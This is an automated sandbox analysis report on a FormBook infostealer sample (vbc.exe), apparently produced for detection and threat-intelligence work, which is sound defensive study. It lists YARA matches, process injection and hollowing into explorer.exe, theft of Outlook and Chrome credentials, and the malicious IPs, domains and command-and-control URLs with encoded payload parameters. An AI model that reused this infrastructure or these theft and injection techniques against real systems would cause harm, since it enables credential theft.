Source: C:\Users\user\Desktop\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680447 Sample: vbc.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 27 www.claudianavarro.online 2->27 29 claudianavarro.online 2->29 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected AntiVM3 2->41 43 5 other signatures 2->43 9 vbc.exe 3 2->9         started        signatures3 process4 file5 25 C:\Users\user\AppData\Local\...\vbc.exe.log, ASCII 9->25 dropped 55 Injects a PE file into a foreign processes 9->55 13 vbc.exe 9->13         started        16 vbc.exe 9->16         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 18 explorer.exe 13->18 injected process9 dnsIp10 31 www.funwave.info 103.141.97.24, 49796, 80 VECTANTARTERIANetworksCorporationJP Japan 18->31 33 reprograme-se10x.com 108.167.169.56, 49798, 49799, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 3 other IPs or domains 18->35 45 System process connects to network (likely due to code injection or exploit) 18->45 22 control.exe 13 18->22         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 22->47 49 Tries to harvest and steal browser information (history, passwords, etc) 22->49 51 Deletes itself after installation 22->51 53 2 other signatures 22->53
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.141.97.24
 www.funwave.info Japan 2519 VECTANTARTERIANetworksCorporationJP true
192.185.131.238
 tadeumilhosrp.com United States
46606 UNIFIEDLAYER-AS-1US true
108.167.169.56
 reprograme-se10x.com United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
tadeumilhosrp.com 192.185.131.238 true
reprograme-se10x.com 108.167.169.56 true
www.funwave.info 103.141.97.24 true
claudianavarro.online 92.249.45.183 true
www.tadeumilhosrp.com unknown unknown
www.claudianavarro.online unknown unknown
www.reprograme-se10x.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.reliabenefitssupport.com/etn4/ true
  • Avira URL Cloud: safe
 low
http://www.reprograme-se10x.com/etn4/ true
  • Avira URL Cloud: safe
 unknown
http://www.reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB true
  • Avira URL Cloud: safe
 unknown
http://www.tadeumilhosrp.com/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ true
  • Avira URL Cloud: safe
 unknown
http://www.funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE true
  • Avira URL Cloud: safe
 unknown
http://www.tadeumilhosrp.com/etn4/ true
  • Avira URL Cloud: safe
 unknown